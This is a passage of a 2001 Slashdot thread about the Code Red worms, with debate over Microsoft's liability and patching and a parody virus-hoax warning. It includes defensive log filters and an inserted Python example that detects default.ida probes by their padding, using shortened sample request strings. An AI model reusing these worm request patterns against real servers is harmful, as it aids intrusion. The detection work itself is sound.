    If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has less vulnerabilities.

  128. Re:Buffer overflow vulnerabilities by unitron · · Score: 2

    But think of the great uptime stat you've got going!

    --

    I see even classic Slashdot is now pretty much unusable on dial up anymore.

  129. Microsoft should be sued by Rosco+P.+Coltrane · · Score: 4, Flamebait
    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

    I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

    (of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
    1. Re:Microsoft should be sued by IronChef · · Score: 2

      you have it backwards. The tide is the industry. The consumers are in the castle.

    2. Re:Microsoft should be sued by mpe · · Score: 2

      Because we're not talking about admins, but gullible users.

      Quite often with Windows the expectation is that "users" and "admins" are one and the same though...

    3. Re:Microsoft should be sued by Keith+Russell · · Score: 5, Insightful
      ...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.
      IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

      Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

      *: This also applies to NT 4.0.
      --
      This sig intentionally left blank.
    4. Re:Microsoft should be sued by blang · · Score: 5, Insightful

      Because we're not talking about admins, but gullible users. When I did a quick tour of the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action lawsuit to me.

      --
      -- Another senseless waste of fine bytes.
    5. Re:Microsoft should be sued by cr0sh · · Score: 3, Insightful

      I can't count the number of times when patches have been applied to NT-based servers, only to have other server software (generally third-party) die after the patch is put into place.

      Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:

      1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
      2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.

      Suddenly, it all makes sense...

      --
      Reason is the Path to God - Anon
    6. Re:Microsoft should be sued by garcia · · Score: 2

      yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

      it is both MS's responsibility and the user's. I agree that the user should know what the hell he is doing, but MS should not have *ANY* service installed by default w/o telling the end user (especially when targeting the market they are).

    7. Re:Microsoft should be sued by blang · · Score: 2
      Printing it in a license does not exempt them from state and federal laws, not to speak about other countries.

      If reckless conduct and damages are proved, the little print in the license is not worth piffle.

      --
      -- Another senseless waste of fine bytes.
  130. Finally by nEoN+nOoDlE · · Score: 5, Funny

    Sequels that are actually better than the original.

    --
    Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
  131. Guess I'll have to avoid synagogues. by Ungrounded+Lightning · · Score: 2

    I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

    Guess I'll have to avoid synagogues.

    But I thought Deuteronimy was a sin whose commission involved Hydrogen 2. Setting off fusion bombs, maybe?

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  132. More info? by Mike+Hicks · · Score: 2

    Anyone have more info? How it looks in logs, etc.?

  133. If the log hits aren't for you, do the right thing by Darby · · Score: 4, Funny

    and see that they go where they belong. I mean seriously, I've seen lots of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the effect of: If you're looking for such and such they're actually located here.
    It's just common courtesy provided it isn't a competitors site.

    So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

    A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

  134. Re:Please by tb3 · · Score: 2

    It's worse than that. Not only did it infect Hotmail servers, but servers on Microsoft's internal network.

    --

    www.lucernesys.com Horizon: Calendar-based personal finance

  135. Code Red 'counter' by Delphis · · Score: 2, Informative

    I'm not too worried about the IP address, although I am interested to know how many times an infection attempt has been tried (amusing when you're using apache 1.3.20). The simple command:

    cat /var/log/httpd/*/access_log.099* | grep default.ida | wc -l

    acts like a simple 'counter', if you have your logs for different sites split up and using rotatelogs like I do.

    --
    Delphis
  136. Just an obvious question or two... by glebite · · Score: 2

    Has anybody in this forum had a machine in their universe infected by the Code Red worm? (any variant) You can reply as AC if you wish...

    Secondly, when Code Red was on your machine, was net access notably slower? Basic machine performance slower?

    I'm just curious as I would figure that an infected machine with several threads of code running would slow my machine down to the point that even if I had no knowledge if IIS were on my machine, I would at least notice a difference...

    I personally think hearing of people's experiences, getting some message out to the press might help. (ie - cable modem and other users running Windows NT or 2000 might have noticed a performance degradation - check for this patch to download) (as if the press coverage wasn't enough to warn people...)

    --
    I donate all spillover Karma to the charity of my choice... Ada was still a babe despite what people may say...
  137. More info on Code Red III by Sideways+The+Dog · · Score: 4, Funny
    WARNING, VIRUS ALERT!!!

    If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code, screw up the tracking on your VCR and use subspace field harmonics to scratch any CDs you try to play.

    It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer. It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

    It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

    It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

    "Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

    --
    "Love is never saying you're too proud." -Tonic
  138. K5 contest by Anonymous Coward · · Score: 2, Informative
    That contest is already running on Kuro5hin. The big "problem" is that many systems don't run IIS with Administrator priv, so the backdoor is limited in how much repair it can do.

    I just have my web server do a "net send %DOMAIN%" to warn them about their problem.

  139. Re:Copycats by Syberghost · · Score: 2

    Would you mind suggesting it to them?

    Yeah, us folks on the Unix side of the operation have been snickering at the NT guys the whole time.

    Unfortunately, some of our stuff requires some of theirs to be there in order to push the data around.

  140. How can you get a BIGGER back door than CRII? by Enigma2175 · · Score: 2
    from the article:
    leaves a wider "back door" on infected machines, making them more vulnerable to future hacking.

    I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

    --

    Enigma

  141. Its called personal web server by gad_zuki! · · Score: 2

    IIS doesn't even run on 9x, ME, or other spawn of 3.x

    Actually you can run a mini version of IIS that could be susceptible to code red on a 95 or 98 machine. The personal webserver from MS is advertised as only working on NT but it'll run on 95 or 98. I haven't tested it on 95 though.

    I've gotten default.ida hits from PWS so I know it's susceptible to at least one kind of code red.

  142. Re:Code Red (I,II,III) Fix for Apache webservers by CM39 · · Score: 2, Funny

    I tried redirecting it and it didn't work. :-)

    --

    "PMS is the time of the month when women act like men do all the time"
    Robert Heinlein
  143. Re:Gives me an idea to stop it spreading so fast.. by srw · · Score: 2, Informative

    It's been done. It's been on slashdot.

    http://slashdot.org/article.pl?sid=01/08/04/1413211&mode=thread

    Look for "codeRedNeck"

  144. So does the GPL by roju · · Score: 2, Insightful

    Have you ever read the GPL?

    It specifically disclaims any and all liabilities and warranties.

    If the Microsoft EULA disclaiming responsibility is invalid, isn't the GPL's? If you argue that GPLed software is free, so consumer protection laws don't apply, then what if you paid Red Hat $15 for their distribution?

    Regardless of whether you paid them for the packaging or the 1-800 support number, you bought something from 'em, so shouldn't they be liable if your linux box ruins your MySQL database?

  145. Re:Copycats by Syberghost · · Score: 2

    And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.

    I completely agree. And yet, despite the fact that I was doing my job, this still left me dead in the water.

    And some of them were working on it when they got the advisory, but couldn't fix it yet because their third-party software doesn't work with Service Pack 6 installed, so they can't install the patch. They were working with the vendors to get the software updated, or working to find or code a replacement, trusting that the NT admins with customer-facing IIS servers would patch.

    Some of those folks were overridden by PHBs.

    While this was going on, I was being told I couldn't install a Sun FTP patch "until it was tested via the normal process", which added about a week of time in which I was subject to a known vulnerability, but couldn't do dick about it.

    Ironically, we installed it Thursday.

    I had it ready to go five minutes after the advisory was released, but couldn't install it for a week, because of management. The NT folks go through similar problems.

  146. Put it in another log and forget about it. by Malc · · Score: 4, Interesting
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    CustomLog /var/log/apache/access.log common env=!code-red-request

    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1
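A worked example in Python, added here and not code from any poster in this thread: it parses Apache common-log lines, picks out the default.ida probes, tells the variants apart by the padding the thread describes (a run of N's for the original Code Red, a run of X's for Code Red II, as in comment 115), and prints the kind of per-day count that comment 111 pastes and comment 135 gets from grep | wc -l, plus the number of distinct source IPs per day. It does not need the separate code-red-request.log that the SetEnvIf/CustomLog lines above produce, though it works just as well on that file. The log lines, addresses and dates are constructed sample data; the N/X rule is the thread's rule of thumb, not an authoritative signature.

```python
"""Classify and count Code Red probes in an Apache access log.

Added example for this thread, not code from any of the posters. The log
lines are constructed sample data; the variant rule (N padding = original
Code Red, X padding = Code Red II) is the one described in the thread.
"""
import re
from collections import defaultdict

# Constructed sample in Apache "common" log format. Real Code Red requests
# carry a much longer run of padding and a %u-encoded payload after it;
# the padding is shortened here.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Aug/2001:03:01:12 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 291
10.0.0.9 - - [07/Aug/2001:03:02:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 291
192.0.2.7 - - [07/Aug/2001:09:15:02 -0400] "GET /index.html HTTP/1.0" 200 1024
10.0.0.9 - - [07/Aug/2001:11:48:17 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 291
this line is not in log format and is skipped
10.0.0.23 - - [08/Aug/2001:00:10:55 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 291
10.0.0.5 - - [08/Aug/2001:02:30:08 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 291
"""

# host ident authuser [dd/Mon/yyyy:HH:MM:SS zone] "method path protocol" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<day>\d{2})/(?P<mon>[A-Za-z]{3})/(?P<year>\d{4}):[^\]]*\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3})'
)

VARIANTS = ("Code Red", "Code Red II", "Code Red (unknown padding)")


def parse_line(line):
    """Return the fields of one common-log line, or None if it does not parse."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["date"] = "{}/{}/{}".format(rec["day"], rec["mon"], rec["year"])
    return rec


def classify(path):
    """Name the Code Red variant a request path looks like, or None for a normal hit."""
    if "default.ida" not in path.lower():
        return None
    query = path.partition("?")[2]
    if query.startswith("NNNN"):
        return "Code Red"
    if query.startswith("XXXX"):
        return "Code Red II"
    return "Code Red (unknown padding)"


def summarize(log_text):
    """Count probes per day and variant, and collect distinct source IPs per day."""
    def new_day():
        d = {name: 0 for name in VARIANTS}
        d["total"] = 0
        d["ips"] = set()
        return d

    per_day = defaultdict(new_day)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed or truncated line
        variant = classify(rec["path"])
        if variant is None:
            continue  # ordinary traffic
        day = per_day[rec["date"]]
        day[variant] += 1
        day["total"] += 1
        day["ips"].add(rec["ip"])
    return dict(per_day)  # insertion order follows the log, i.e. chronological


def format_report(summary):
    """Render the summary in the style of the daily report quoted in the thread."""
    out = []
    for date, day in summary.items():
        out.append("Report for {}".format(date))
        for name in VARIANTS:
            if day[name] or name != "Code Red (unknown padding)":
                out.append("{} {}".format(day[name], name))
        out.append("{} Total attacks from {} distinct IPs".format(day["total"], len(day["ips"])))
        out.append("")
    return "\n".join(out)


if __name__ == "__main__":
    print(format_report(summarize(SAMPLE_LOG)))
```

To run it over a real file, pass `open("/var/log/apache/access.log").read()` to `summarize` instead of the sample; lines that are not in common log format are skipped rather than aborting the run, so a rotated or partially written file is fine. The `ips` set per day answers the question in the story summary more directly than the raw line count, since one infected host typically shows up many times.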
  147. Interesting Irony by Naerbnic · · Score: 5, Funny

    So, Three Code Reds and a SirCam later, the question just begs to be asked:

    Who's calling Whose code "Potentially Viral"?

    --

    So there I was, juggling apples and small animals, when I accidentally bit into the wrong one...
  148. Worthy by fobbman · · Score: 2

    Now this is a sequel worthy of the name The Clone Wars.

  149. I think you're on to something... by Nate+Fox · · Score: 5, Informative

    According to Symantec's page on CR2:

    Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C